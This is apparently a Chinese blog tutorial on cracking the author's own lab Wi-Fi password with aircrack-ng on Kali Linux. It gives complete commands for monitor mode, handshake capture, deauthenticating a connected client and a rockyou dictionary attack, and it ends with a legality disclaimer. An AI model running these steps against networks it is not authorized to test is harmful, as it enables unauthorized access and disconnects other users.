记一次使用Aircrack"破解"实验室无线网密码

环境准备: 一台kali Linux的虚拟机,一台win10的物理机

1) 打开 网卡的Monitor(监控)模式

    > lsusb

在命令行运行 lsusb 查看当前系统的USB设备,因为我这里使用的是无线网卡,很明显第一个设备就是插入的网卡,网卡为Ralink类型,芯片为MT7601U,已经自动安装好驱动程序。
这里写图片描述

airmon-ng

运行 airmon-ng 命令,查看可支持开启Monitor模式的网卡,很明显这就是我们插入的Ralink网卡。
这里写图片描述

airmon-ng start wlan0

开启监控模式,这里的wlano就是使用airmon-ng 查看得到的Interface名字
这里写图片描述
开启监控模式后wlan0这个设备就会变为wlan0mon,网卡的工作模式也变为Monitor 可以使用iwconfig查看下。
这里写图片描述

2) 当前当前环境下的WIFI网络

airodump-ng wlan0mon

我们此次试验破解的WIFI名称为TP-LINK_C4E7
这里写图片描述

  • BSSID是AP端的MAC地址
  • PWR是信号强度,数字越小越好
  • Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
  • CH是对应路由器的所在频道
  • ESSID是对应路由器的名称

3)抓取握手包

当有新用户连接WIFI,或者断开WIFI中心连接的过程中会发送握手包,这是开启监控模式的网卡就可以抓取到这个握手包。

airodump-ng -c 11 –bssid F4:83:CD:C9:C4:E7 -w ~/ wlan0mon

  • -c 指定频道号,这里是11
  • -bssid 指定路由器的bssid这里是 F4:83:CD:C9:C4:E7
  • -w 指定数据包的地址 ~/表示存放在/root路径下

这里写图片描述

这里的STATION就是当前连接到这个网络的电脑的MAC地址(就是我啦),在电脑的CMD命令行中出入 ipconfig/all 命令就可以查看本机MAC地址。
这里写图片描述

4) 强制连接到WIFI的用户重新连接WIFI。

这时我们可以等新用户使用密码连接(谁知道会不会有新用户连接(ㄒoㄒ)),时间是很宝贵的,所以我们要做的就是强制某个已连接的电脑断开WIFI并且重新连接(PS. 基本上无法察觉,只是会断网几秒钟),

aireplay-ng -deauth 2 -a F4:83:CD:C9:C4:E7 -c 38-B1-DB-FD-9B-23 wlan0mon

  • -deauth 表示进行解除认证攻击(告诉已连接的电脑路由器不认识你了,需要你重新登录) 后面的2表示攻击的次数,如果为0表示无线攻击,被攻击的电脑就无法连接WIFI了(PS.尽量不要这么做)。
  • -a 后面指定路由器的bssid,前面已经提到过
  • -c 后面指定被攻击的电脑的MAC地址

攻击成功后抓包的界面就会显示
这里写图片描述

至此抓包过程就结束了,关闭网卡的Monitor模式

airmon-ng stop wlan0mon

5)破解密码

破解密码需要字典就和英语字典一样,kali本身就带有rockyou字典。这里我已经解压好了,第一次使用需要解压。
这里写图片描述
开始破解

aircrack-ng -a2 -b F4:83:CD:C9:C4:E7 -w /usr/share/wordlists/rockyou.txt ~/*.cap
- -b 后面指定路由器的bssid
- -w 指定字典位置 在后面跟抓到的包

破解完毕,因为密码超级简单所以破解过程花了大概5s? (PS.这就是设密码的时候要设置复杂的原因ヽ( ̄▽ ̄)ノ)
这里写图片描述

Attention Please!!! 破解其他人的密码是一种”违法”的行为,此次破解的目的只是为证明设置密码要越复杂越好,绝无其它想法(( • ̀ω•́ )✧)。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章